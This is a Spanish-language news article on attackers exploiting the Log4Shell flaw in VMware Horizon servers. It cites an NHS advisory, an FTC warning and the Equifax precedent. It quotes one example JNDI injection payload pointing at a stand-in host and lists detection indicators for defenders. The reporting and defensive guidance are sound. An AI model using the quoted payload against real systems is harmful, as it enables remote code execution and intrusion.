imágenes falsas
Los delincuentes están explotando activamente la vulnerabilidad Log4Shell de alta gravedad en servidores que ejecutan VMware Horizon en un intento de instalar malware que les permita obtener el control total de los sistemas afectados, advierte el sistema de salud financiado con fondos públicos del Reino Unido.
CVE-2021-44228 es una de las vulnerabilidades más severas que han salido a la luz en los últimos años. Reside en Log4J, una biblioteca de código de registro del sistema utilizada en miles, si no millones, de aplicaciones y sitios web de terceros. Eso significa que hay una gran base de sistemas vulnerables. Además, la vulnerabilidad es extremadamente fácil de explotar y permite a los atacantes instalar shells web, que proporcionan una ventana de comandos para ejecutar comandos con privilegios elevados en servidores pirateados.
La falla de ejecución de código remoto en Log4J salió a la luz en diciembre después de que se lanzó el código de explotación antes de que estuviera disponible un parche. Los piratas informáticos maliciosos rápidamente comenzaron a explotar activamente CVE-2021-44228 para comprometer sistemas confidenciales.
Los ataques, incluidos los dirigidos a VMware Horizon, han estado en curso desde entonces.
“Se ha observado un grupo de amenazas desconocido dirigido a servidores VMware Horizon que ejecutan versiones afectadas por Vulnerabilidades de Log4Shell para establecer la persistencia dentro de las redes afectadas”, funcionarios del Sistema Nacional de Salud del Reino Unido. escribió. Continuaron brindando orientación sobre los pasos específicos que las organizaciones afectadas pueden tomar para mitigar la amenaza.
La principal de ellas es la recomendación de instalar una actualización que VMware lanzado por su producto Horizon, que brinda a las organizaciones un medio para virtualizar las capacidades de las aplicaciones y los escritorios utilizando la tecnología de virtualización de la empresa. Los funcionarios del NHS también notaron señales que las organizaciones vulnerables pueden buscar para identificar posibles ataques que puedan haber sufrido.
El aviso llega un día después de que la Comisión Federal de Comercio prevenido las empresas orientadas al consumidor para parchear los sistemas vulnerables para evitar el destino de Equifax. En 2019, la agencia de informes crediticios acordó pagar $575 millones para liquidar los cargos de la FTC resultantes de no parchear una vulnerabilidad igualmente grave en una pieza de software diferente conocida como Apache Struts. Cuando un atacante desconocido explotó la vulnerabilidad en la red de Equifax, comprometió datos confidenciales de 143 millones de personas, lo que la convirtió en una de las peores filtraciones de datos de la historia.
“La FTC tiene la intención de utilizar toda su autoridad legal para perseguir a las empresas que no toman medidas razonables para proteger los datos de los consumidores de la exposición como resultado de Log4j o vulnerabilidades similares conocidas en el futuro”, funcionarios de la FTC. dicho
El NHS es al menos la segunda organización en observar exploits dirigidos a un producto de VMware. El mes pasado, los investigadores reportado que los atacantes tenían como objetivo los sistemas que ejecutan VMware VCenter con el objetivo de instalar el ransomware Conti.
Los ataques dirigidos a servidores VMware Horizon sin parches apuntan a su uso de un servicio de código abierto.
“Es muy probable que el ataque se inicie a través de una carga útil de Log4Shell similar a ${jndi:ldap://example.com}”, indicó el aviso del NHS. “El ataque explota la vulnerabilidad Log4Shell en el servicio Apache Tomcat que está integrado en VMware Horizon. Esto luego lanza el siguiente comando de PowerShell, generado desde ws_TomcatService.exe:”
Servicio Nacional de Salud
Siguiendo algunos pasos adicionales, los atacantes pueden instalar un shell web que tiene comunicación persistente con un servidor que controlan. Aquí hay una representación del ataque:
Servicio Nacional de Salud
El aviso agregó:
Las organizaciones deben buscar lo siguiente:
- Evidencia de ws_TomcatService.exe procesos anormales de desove
- Ningún powershell.exe procesos que contienen ‘VMBlastSG’ en la línea de comandos
- Modificaciones de archivo a ‘…VMwareVMware ViewServerappblastgatewaylibabsg-worker.js’: este archivo generalmente se sobrescribe durante las actualizaciones y no se modifica
La empresa de seguridad Praetorian dio a conocer el viernes esta herramienta para identificar sistemas vulnerables a escala.